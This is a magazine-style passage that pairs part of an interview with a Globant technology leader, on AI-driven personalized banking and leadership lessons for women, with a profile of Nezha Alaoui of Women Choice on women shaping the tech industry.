Great leadership is about inspiring, empowering, and driving meaningful impact. I believe that staying curious, agile, and engaged is what makes this journey fulfilling.
As a woman leader in technology, how do you see AI-driven personalized banking solutions advancing financial inclusion, particularly for women and underserved communities?
AI is reshaping financial services, making them more accessible than ever. Traditional banking models often rely on rigid credit requirements, leaving many individuals—including those in emerging markets—without access to essential financial tools. We are now seeing AI-driven solutions democratizing access to banking, credit, and investment opportunities, reaching populations that were previously underserved.
In regions like the Middle East, where financial ecosystems are evolving rapidly, AI has the potential to expand access to personalized financial services at a larger scale. By leveraging alternative data and intelligent credit scoring, financial institutions can move beyond traditional eligibility criteria and offer more inclusive, tailored financial solutions.
At Globant, we believe in technology for good. AI shouldn’t just drive efficiency; it should empower people. If leveraged correctly, it can help millions gain financial independence and control over their economic futures. The key is to ensure that these technologies are designed with inclusivity, transparency, and ethical considerations at their core.
What’s one important leadership lesson you’ve learned that every woman in leadership roles should embrace?
One of the most important lessons I’ve learned is to embrace challenges, take risks and step out of comfort zones. Growth happens when we push ourselves beyond what feels familiar—whether that means leading a new initiative, transitioning into a different industry, or taking on a bigger role. The key is to say yes to opportunities, even before feeling fully ready—because that’s where real development happens.
Having spent many years in the Middle East, I’ve witnessed firsthand the significant progress in women’s inclusion and leadership across industries. More women are stepping into technology, entrepreneurship, and executive roles, actively shaping the region’s innovation landscape. This transformation highlights the impact of opportunity, mentorship, and education—key drivers of meaningful and lasting change.
Another key lesson is the power of community and mentorship. No one succeeds alone, and building strong networks of support, collaboration, and knowledge-sharing is essential for any leader. At Globant, we encourage a mindset of boldness and continuous learning, providing the tools and support for people to develop professionally and thrive. We actively promote STEM education and initiatives that encourage young women to pursue careers in technology and leadership.
To anyone looking to thrive in tech, my advice is simple:
- Keep learning and evolving—curiosity fuels growth
- Build a network of people who challenge, support, and inspire you
- Own your journey—confidence comes from action, not just certainty
The future of technology is diverse, and we all have a role in shaping it.
How Women Are Shaping Tech

By Nezha Alaoui
The tech industry has long been a space defined by innovation and progress, yet when it comes to gender diversity, the sector still has ground to cover. Despite increased awareness, women remain underrepresented in leadership roles, funding opportunities, and technical positions. For Nezha Alaoui, Founder and CEO of Women Choice, the conversation is not just about bridging gaps but about ensuring women play a central role in shaping the future of technology.
Being a social impact entrepreneur and global thought leader, Alaoui has worked extensively on initiatives aimed at empowering women in professional spaces. She emphasizes that while talent is equally distributed, opportunities are not. “The challenge is not a lack of skill or ambition, it is the absence of access, mentorship, and representation,” she says.
Through Women Choice, Nezha has collaborated with Fortune 500 companies and institutions to implement mentorship programs, leadership training, and inclusive hiring strategies to help women navigate and advance in the tech industry. In the last twelve months, Nezha and her team gathered 550+ women in tech in a series of monthly events held in Dubai in partnership with a tech leader. She is creating spaces where women can connect, learn, and step into leadership roles. She acknowledges that real progress requires a shift beyond policies; it demands a cultural change within organizations and the industry at large.
She also highlights the importance of visibility in driving change. “When women see leaders who look like them, it creates a ripple effect. It signals that there’s space for them at the table,” Alaoui notes. Her work is focused on fostering real connections, creating professional pathways, and ensuring that inclusion is not just a buzzword, but a business imperative.
As technology continues to shape every aspect of modern life, ensuring diverse perspectives in its development at a grassroots level is crucial. Nezha believes that tech companies must go beyond performative gestures and commit to real structural changes. From funding more women-led startups to building diverse and dynamic leadership teams, the industry stands to benefit from making inclusivity a core part of its growth.
While the road ahead remains challenging, Alaoui remains optimistic. “The future of tech is being written today, let’s make sure women are co-authors of that story.”